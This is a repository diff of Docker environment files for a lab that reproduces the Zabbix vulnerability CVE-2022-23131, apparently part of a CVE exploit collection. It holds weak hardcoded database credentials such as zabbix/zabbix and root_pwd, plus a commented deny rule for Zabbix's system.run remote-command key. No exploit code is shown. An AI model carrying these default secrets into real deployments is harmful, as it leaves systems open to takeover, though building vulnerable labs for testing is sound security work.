00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.MYSQL_USER

@@ -0,0 +1 @@
+zabbix

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.POSTGRES_PASSWORD

@@ -0,0 +1 @@
+zabbix

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.POSTGRES_USER

@@ -0,0 +1 @@
+zabbix

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_agent

@@ -0,0 +1,37 @@
+# ZBX_SOURCEIP=
+# ZBX_DEBUGLEVEL=3
+# ZBX_ENABLEREMOTECOMMANDS=0 # Deprecated since 5.0.0
+# ZBX_LOGREMOTECOMMANDS=0
+# ZBX_HOSTINTERFACE= # Available since 4.4.0
+# ZBX_HOSTINTERFACEITEM= # Available since 4.4.0
+# ZBX_SERVER_HOST=zabbix-server
+# ZBX_PASSIVE_ALLOW=true
+# ZBX_PASSIVESERVERS=
+# ZBX_ACTIVE_ALLOW=true
+# ZBX_ACTIVESERVERS=
+# ZBX_LISTENIP=
+# ZBX_STARTAGENTS=3
+# ZBX_HOSTNAME=
+# ZBX_HOSTNAMEITEM=system.hostname
+# ZBX_METADATA=
+# ZBX_METADATAITEM=
+# ZBX_REFRESHACTIVECHECKS=120
+# ZBX_BUFFERSEND=5
+# ZBX_BUFFERSIZE=100
+# ZBX_MAXLINESPERSECOND=20
+# ZBX_ALIAS=""
+# ZBX_TIMEOUT=3
+# ZBX_UNSAFEUSERPARAMETERS=0
+# ZBX_LOADMODULE="dummy1.so,dummy2.so,dummy10.so"
+# ZBX_TLSCONNECT=unencrypted
+# ZBX_TLSACCEPT=unencrypted
+# ZBX_TLSCAFILE=
+# ZBX_TLSCRLFILE=
+# ZBX_TLSSERVERCERTISSUER=
+# ZBX_TLSSERVERCERTSUBJECT=
+# ZBX_TLSCERTFILE=
+# ZBX_TLSKEYFILE=
+# ZBX_TLSPSKIDENTITY=
+# ZBX_TLSPSKFILE=
+# ZBX_DENYKEY=system.run[*]
+# ZBX_ALLOWKEY=

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_db_mysql

@@ -0,0 +1,11 @@
+# DB_SERVER_HOST=mysql-server
+# DB_SERVER_PORT=3306
+# MYSQL_USER=zabbix
+MYSQL_USER_FILE=/run/secrets/MYSQL_USER
+# MYSQL_PASSWORD=zabbix
+MYSQL_PASSWORD_FILE=/run/secrets/MYSQL_PASSWORD
+# MYSQL_ROOT_PASSWORD=
+MYSQL_ROOT_PASSWORD_FILE=/run/secrets/MYSQL_ROOT_PASSWORD
+# MYSQL_ALLOW_EMPTY_PASSWORD=false
+# MYSQL_DATABASE=zabbix
+MYSQL_DATABASE=zabbix

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_db_mysql_proxy

@@ -0,0 +1,14 @@
+# DB_SERVER_HOST=mysql-server
+# DB_SERVER_PORT=3306
+# MYSQL_USER=zabbix
+MYSQL_USER=zabbix
+# MYSQL_USER_FILE=/run/secrets/MYSQL_USER
+# MYSQL_PASSWORD=zabbix
+MYSQL_PASSWORD=zabbix
+# MYSQL_PASSWORD_FILE=/run/secrets/MYSQL_PASSWORD
+# MYSQL_ROOT_PASSWORD=
+MYSQL_ROOT_PASSWORD=root_pwd
+# MYSQL_ROOT_PASSWORD_FILE=/run/secrets/MYSQL_ROOT_PASSWORD
+# MYSQL_ALLOW_EMPTY_PASSWORD=false
+# MYSQL_DATABASE=zabbix_proxy
+MYSQL_DATABASE=zabbix_proxy

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_db_pgsql

@@ -0,0 +1,11 @@
+# DB_SERVER_HOST=postgres-server
+# DB_SERVER_PORT=5432
+# POSTGRES_USER=zabbix
+POSTGRES_USER_FILE=/run/secrets/POSTGRES_USER
+# POSTGRES_PASSWORD=zabbix
+POSTGRES_PASSWORD_FILE=/run/secrets/POSTGRES_PASSWORD
+# POSTGRES_DB=zabbix
+POSTGRES_DB=zabbix
+# DB_SERVER_SCHEMA=public
+# ENABLE_TIMESCALEDB=true
+# POSTGRES_USE_IMPLICIT_SEARCH_PATH=false

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_java

@@ -0,0 +1,4 @@
+# ZBX_START_POLLERS=5
+# ZBX_TIMEOUT=3
+# Possible values: trace, debug, info, want, error, all, off
+# ZBX_DEBUGLEVEL=info

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_prx

@@ -0,0 +1,63 @@
+# ZBX_PROXYMODE=0
+# ZBX_SERVER_HOST=zabbix-server
+# ZBX_SERVER_PORT=10051
+# ZBX_HOSTNAME=zabbix-proxy-$db_type
+# ZBX_ENABLEREMOTECOMMANDS=0 # Available since 3.4.0
+# ZBX_LOGREMOTECOMMANDS=0 # Available since 3.4.0
+# ZBX_HOSTNAMEITEM=system.hostname
+# ZBX_SOURCEIP=
+# ZBX_DBTLSCONNECT=require # Available since 5.0.0
+# ZBX_DBTLSCAFILE=/run/secrets/root-ca.pem # Available since 5.0.0
+# ZBX_DBTLSCERTFILE=/run/secrets/client-cert.pem # Available since 5.0.0
+# ZBX_DBTLSKEYFILE=/run/secrets/client-key.pem # Available since 5.0.0
+# ZBX_DBTLSCIPHER= # Available since 5.0.0
+# ZBX_DBTLSCIPHER13= # Available since 5.0.0
+# ZBX_DEBUGLEVEL=3
+# ZBX_PROXYLOCALBUFFER=0
+# ZBX_PROXYOFFLINEBUFFER=1
+# ZBX_PROXYHEARTBEATFREQUENCY=60
+# ZBX_CONFIGFREQUENCY=3600
+# ZBX_DATASENDERFREQUENCY=1
+# ZBX_STARTPOLLERS=5
+# ZBX_IPMIPOLLERS=0
+# ZBX_STARTPOLLERSUNREACHABLE=1
+# ZBX_STARTTRAPPERS=5
+# ZBX_STARTPINGERS=1
+# ZBX_STARTDISCOVERERS=1
+# ZBX_STARTHTTPPOLLERS=1
+# ZBX_JAVAGATEWAY_ENABLE=false
+# ZBX_JAVAGATEWAY=zabbix-java-gateway
+# ZBX_JAVAGATEWAYPORT=10052
+# ZBX_STARTJAVAPOLLERS=0
+# ZBX_STARTVMWARECOLLECTORS=0
+# ZBX_VMWAREFREQUENCY=60
+# ZBX_VMWAREPERFFREQUENCY=60
+# ZBX_VMWARECACHESIZE=8M
+# ZBX_VMWARETIMEOUT=10
+# ZBX_ENABLE_SNMP_TRAPS=false
+# ZBX_LISTENIP=
+# ZBX_HOUSEKEEPINGFREQUENCY=1
+# ZBX_CACHESIZE=8M
+# ZBX_STARTDBSYNCERS=4
+# ZBX_HISTORYCACHESIZE=16M
+# ZBX_HISTORYINDEXCACHESIZE=4M
+# ZBX_TIMEOUT=4
+# ZBX_TRAPPERTIMEOUT=300
+# ZBX_UNREACHABLEPERIOD=45
+# ZBX_UNAVAILABLEDELAY=60
+# ZBX_UNREACHABLEDELAY=15
+# ZBX_LOGSLOWQUERIES=3000
+# ZBX_LOADMODULE="dummy1.so,dummy2.so,dummy10.so"
+# ZBX_TLSCONNECT=unencrypted
+# ZBX_TLSACCEPT=unencrypted
+# ZBX_TLSCAFILE=
+# ZBX_TLSCRLFILE=
+# ZBX_TLSSERVERCERTISSUER=
+# ZBX_TLSSERVERCERTSUBJECT=
+# ZBX_TLSCERTFILE=
+# ZBX_TLSKEYFILE=
+# ZBX_TLSPSKIDENTITY=
+# ZBX_TLSPSKFILE=
+# ZBX_VAULTDBPATH=
+# ZBX_VAULTURL=https://127.0.0.1:8200
+# VAULT_TOKEN=

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_prx_mysql

@@ -0,0 +1 @@
+# ZBX_HOSTNAME=zabbix-proxy-mysql

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_prx_sqlite3

@@ -0,0 +1 @@
+# ZBX_HOSTNAME=zabbix-proxy-sqlite3

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_srv

@@ -0,0 +1,62 @@
+# ZBX_LISTENIP=
+# ZBX_HISTORYSTORAGEURL=http://elasticsearch:9200/ # Available since 3.4.5
+# ZBX_HISTORYSTORAGETYPES=uint,dbl,str,log,text # Available since 3.4.5
+# ZBX_DBTLSCONNECT=required # Available since 5.0.0
+# ZBX_DBTLSCAFILE=/run/secrets/root-ca.pem # Available since 5.0.0
+# ZBX_DBTLSCERTFILE=/run/secrets/client-cert.pem # Available since 5.0.0
+# ZBX_DBTLSKEYFILE=/run/secrets/client-key.pem # Available since 5.0.0
+# ZBX_DBTLSCIPHER= # Available since 5.0.0
+# ZBX_DBTLSCIPHER13= # Available since 5.0.0
+# ZBX_DEBUGLEVEL=3
+# ZBX_STARTPOLLERS=5
+# ZBX_IPMIPOLLERS=0
+# ZBX_STARTPREPROCESSORS=3 # Available since 3.4.0
+# ZBX_STARTPOLLERSUNREACHABLE=1
+# ZBX_STARTTRAPPERS=5
+# ZBX_STARTPINGERS=1
+# ZBX_STARTDISCOVERERS=1
+# ZBX_STARTHTTPPOLLERS=1
+# ZBX_STARTTIMERS=1
+# ZBX_STARTESCALATORS=1
+# ZBX_STARTALERTERS=3 # Available since 3.4.0
+ZBX_JAVAGATEWAY_ENABLE=true
+# ZBX_JAVAGATEWAY=zabbix-java-gateway
+# ZBX_JAVAGATEWAYPORT=10052
+ZBX_STARTJAVAPOLLERS=5
+# ZBX_STARTVMWARECOLLECTORS=0
+# ZBX_VMWAREFREQUENCY=60
+# ZBX_VMWAREPERFFREQUENCY=60
+# ZBX_VMWARECACHESIZE=8M
+# ZBX_VMWARETIMEOUT=10
+ZBX_ENABLE_SNMP_TRAPS=true
+# ZBX_SOURCEIP=
+# ZBX_HOUSEKEEPINGFREQUENCY=1
+# ZBX_MAXHOUSEKEEPERDELETE=5000
+# ZBX_SENDERFREQUENCY=30
+# ZBX_CACHESIZE=8M
+# ZBX_CACHEUPDATEFREQUENCY=60
+# ZBX_STARTDBSYNCERS=4
+# ZBX_HISTORYCACHESIZE=16M
+# ZBX_HISTORYINDEXCACHESIZE=4M
+# ZBX_TRENDCACHESIZE=4M
+# ZBX_VALUECACHESIZE=8M
+# ZBX_TIMEOUT=4
+# ZBX_TRAPPERTIMEOUT=300
+# ZBX_UNREACHABLEPERIOD=45
+# ZBX_UNAVAILABLEDELAY=60
+# ZBX_UNREACHABLEDELAY=15
+# ZBX_LOGSLOWQUERIES=3000
+# ZBX_EXPORTFILESIZE=
+# ZBX_STARTPROXYPOLLERS=1
+# ZBX_PROXYCONFIGFREQUENCY=3600
+# ZBX_PROXYDATAFREQUENCY=1
+# ZBX_LOADMODULE="dummy1.so,dummy2.so,dummy10.so"
+# ZBX_TLSCAFILE=
+# ZBX_TLSCRLFILE=
+# ZBX_TLSCERTFILE=
+# ZBX_TLSKEYFILE=
+# ZBX_VAULTDBPATH=
+# ZBX_VAULTURL=https://127.0.0.1:8200
+# VAULT_TOKEN=
+# ZBX_STARTREPORTWRITERS=0
+# ZBX_WEBSERVICEURL=http://zabbix-web-service:10053/report

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_web

@@ -0,0 +1,27 @@
+# ZBX_SERVER_HOST=zabbix-server
+# ZBX_SERVER_PORT=10051
+ZBX_SERVER_NAME=Composed installation
+# ZBX_DB_ENCRYPTION=true # Available since 5.0.0
+# ZBX_DB_KEY_FILE=/run/secrets/client-key.pem # Available since 5.0.0
+# ZBX_DB_CERT_FILE=/run/secrets/client-cert.pem # Available since 5.0.0
+# ZBX_DB_CA_FILE=/run/secrets/root-ca.pem # Available since 5.0.0
+# ZBX_DB_VERIFY_HOST=false # Available since 5.0.0
+# ZBX_DB_CIPHER_LIST= # Available since 5.0.0
+# ZBX_VAULTDBPATH=
+# ZBX_VAULTURL=https://127.0.0.1:8200
+# VAULT_TOKEN=
+# ZBX_HISTORYSTORAGEURL=http://elasticsearch:9200/ # Available since 3.4.5
+# ZBX_HISTORYSTORAGETYPES=['uint', 'dbl', 'str', 'text', 'log'] # Available since 3.4.5
+# ZBX_SSO_SETTINGS=[] # Available since 5.0.0
+# ENABLE_WEB_ACCESS_LOG=true
+# ZBX_MAXEXECUTIONTIME=600
+# ZBX_MEMORYLIMIT=128M
+# ZBX_POSTMAXSIZE=16M
+# ZBX_UPLOADMAXFILESIZE=2M
+# ZBX_MAXINPUTTIME=300
+# ZBX_SESSION_NAME=zbx_sessionid
+# Timezone one of: http://php.net/manual/en/timezones.php
+# PHP_TZ=Europe/Riga
+# ZBX_DENY_GUI_ACCESS=false
+# ZBX_GUI_ACCESS_IP_RANGE=['127.0.0.1']
+# ZBX_GUI_WARNING_MSG=Zabbix is under maintenance.

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.env_web_service

@@ -0,0 +1,9 @@
+# ZBX_DEBUGLEVEL=3
+ZBX_ALLOWEDIP=zabbix-server
+# ZBX_LISTENPORT=10053
+# ZBX_LISTENIP=
+# ZBX_TIMEOUT=3
+# ZBX_TLSACCEPT=unencrypted
+# ZBX_TLSCAFILE=
+# ZBX_TLSCERTFILE=
+# ZBX_TLSKEYFILE=